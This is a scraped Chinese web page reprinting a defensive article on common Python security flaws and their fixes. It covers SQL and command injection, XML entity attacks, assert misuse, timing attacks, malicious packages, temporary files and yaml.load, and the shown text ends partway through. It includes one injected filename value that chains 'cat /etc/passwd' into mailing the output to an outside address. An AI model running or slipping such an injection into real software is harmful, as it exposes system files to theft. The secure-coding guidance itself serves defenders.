<span id="thb9y"></span>
  • <button id="thb9y"><acronym id="thb9y"><input id="thb9y"></input></acronym></button>
    <th id="thb9y"></th>

    <legend id="thb9y"><p id="thb9y"></p></legend>
  • <th id="thb9y"></th>

      设为首页 - 加入收藏 镇江站长网 (http://www.ceprya.net)- 中小站长必上的网站 - 聚焦镇江站长前沿资讯!
      热搜: 手机 优酷 中国 创业者
      当前位置: 主页 > 新闻资讯 > 评论 > 正文

      Python常见安全漏洞及修复方法集合!你所不会的这里都有!

      发布时间:2018-11-16 07:58 所属栏目:[评论] 来源:智能运维小讲堂
      导读:副标题#e# 概述 编写安全的代码很困难,当你学习一门编程语言、一个模块或框架时,你会学习其使用方法。在考虑安全性时,你需要考虑如何避免代码被滥用,Python也不例外,即使在标准库中,也存在着许多糟糕的实例。然而,许多 Python 开发人员却根本不知道

      概述

      Python常见安全漏洞及修复方法集合!你所不会的这里都有!

      编写安全的代码很困难,当你学习一门编程语言、一个模块或框架时,你会学习其使用方法。在考虑安全性时,你需要考虑如何避免代码被滥用,Python也不例外,即使在标准库中,也存在着许多糟糕的实例。然而,许多 Python 开发人员却根本不知道这些。

      以下是我总结的10个Python常见安全漏洞,排名不分先后。

      Python中的10个常见安全漏洞及修复方法

      1、输入注入

      注入攻击影响广泛且很常见,注入有很多种类,它们影响所有的语言、框架和环境。

      SQL 注入是直接编写 SQL 查询(而非使用 ORM) 时将字符串与变量混合。我读过很多代码,其中“引号字符转义”被认为是一种修复,但事实并非如此,可以通过 SQL 注入所有可能发生的方式。

      命令注入有可能在使用 popen、subprocess、os.system 调用一个进程并从变量中获取参数时发生,当调用本地命令时,有人可能会将某些值设置为恶意值。

      下面是个简单的脚本(链接:https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html),使用用户提供的文件名调用子进程:

      Python中的10个常见安全漏洞及修复方法

      攻击者会将filename的值设置为“; cat /etc/passwd | mail them@domain.com或者其他同样危险的值。

      修复方法:

      如果你使用了 Web 框架,可以用附带的实用程序对输入进行清理,除非有充分的理由,否则不要手动构建 SQL 查询,大多数 ORM 都有内置的清理方法。

      对于 shell,可以使用 shlex 模块正确地转义输入。

      2、解析XML

      如果您的应用程序加载并解析XML文件,可能您正在使用一个XML标准库模块。有一些针对XML的常见攻击。大多数为DoS风格(旨破坏系统而不是盗取数据)。这些攻击很常见,特别是在解析外部(即不可信任的)XML文件时。

      其中一种攻击为“billion laughs”,因为加载的文件包含了很多个(数十亿)“lols”。你可以加载XML实体文件,当XML解析器试图将这个XML文件加载到内存中时,会消耗很多个G的内存。不信就试试看:-)

      Python中的10个常见安全漏洞及修复方法

      另一种攻击使用外部实体扩展。 XML支持从外部URL引用实体,XML解析器通常会直接获取并加载该资源。“攻击者可以绕开防火墙访问保密资源,因为所有请求都是由内部可信的IP地址创建的,请求不是来自于外部。”

      需要考虑的另一种情况是您要依赖于第三方软件包来解码XML,例如配置文件,,远程API。您甚至不知道您的某个依赖包已经暴露在攻击之下。

      那么在Python中会发生什么?标准库模块etree,DOM,xmlrpc都容易遭受这些类型的攻击。详情参考此链接: https://docs.python.org/3/library/xml.html#xml-vulnerabilities

      修复方法:

      直接用defusedxml(链接:https://pypi.org/project/defusedxml/)替换标准库模块。它增加了针对这类攻击的安全防护。

      3、Assert 语句

      不要使用 assert 语句来防止用户访问特定代码段。例如:

      Python中的10个常见安全漏洞及修复方法

      默认情况下,Python 以 __debug__ 为 true 来执行脚本,但在真实环境中,通常使用优化运行,这将会跳过 assert 语句并直接转到安全代码,而不管用户是否是 is_admin 。

      修复方法:

      仅在单元测试中使用 assert 语句。

      4、计时攻击

      计时攻击本质上是一种通过计算比较提供值所需时间来暴露行为和算法的方式。计时攻击需要精确性,所以通常不能用于高延迟的远程网络。由于大多数 Web 应用程序涉及可变延迟,因此几乎不可能针对 HTTP Web 服务器编写计时攻击。

      但是,如果你的应用程序有提示输入密码的命令行,攻击者就可以编写一个简单的脚本来计算将其值与实际密码进行比较所需的时间。例子参考链接:http://jyx.github.io/blog/2014/02/02/timing-attack-proof-of-concept/

      这里有一个基于SSH计时攻击的Python 工具,你可以看看如何使用它。链接:https://github.com/c0r3dump3d/osueta

      修复方法:

      使用在 Python 3.5 中引入的 secrets.compare_digest 来比较密码和其他私密值。

      5、感染site-packages 或导入路径

      Python的导入系统非常灵活。当你为测试程序编写猴子补丁,或者重载核心函数时,你会感觉非常方便。

      但这也是Python最大的安全漏洞之一。

      将第三方包安装到site-packages中,无论是在虚拟环境中还是在全局site-packages中,你都将暴露在安全风险中。

      有一些发布到PyPi的包与流行的包具有相似的名称,但是却执行了任意代码。幸运的是,这很可能没有太大危害,只会“明确表示”这个问题没有得到真正的解决。

      需要考虑的另一种情况是多层依赖包。它们可能包含漏洞,它们也可以通过导入系统重写Python默认行为。

      修复方法:

      你可以利用PyUp.io这个网站提供的工具检查你的第三方包。使用虚拟环境,确保您的全局site-packages尽可能干净。检查包签名。

      6、临时文件

      要在 Python 中创建临时文件,你通常会使用 mktemp ( )函数生成一个文件名,然后使用该名称创建一个文件。 “这是不安全的,因为另一个进程可能会在调用 mktemp ( )和随后尝试通过第一个进程创建文件之间的空隙创建一个同名文件。”这意味着应用程序可能加载错误的数据或暴露其他的临时数据。

      如果调用不正确,最新版本的 Python 会发出运行警告。

      修复方法:

      如果需要生成临时文件,请使用 tempfile 模块并使用 mkstemp。(参考链接:https://docs.python.org/3/library/tempfile.html#tempfile.mkstemp)

      7、使用 yaml.load

      这里引用 PyYAML 的说明文档:

      警告:使用不可信源的数据调用 yaml.load 是不安全的! yaml.load 和pickle.load 一样强大,所以可以调用任何 Python 函数。

      【免责声明】本站内容转载自互联网,其相关言论仅代表作者个人观点绝非权威,不代表本站立场。如您发现内容存在版权问题,请提交相关链接至邮箱:bqsm@foxmail.com,我们将及时予以处理。

      网友评论
      推荐文章
      旺彩平台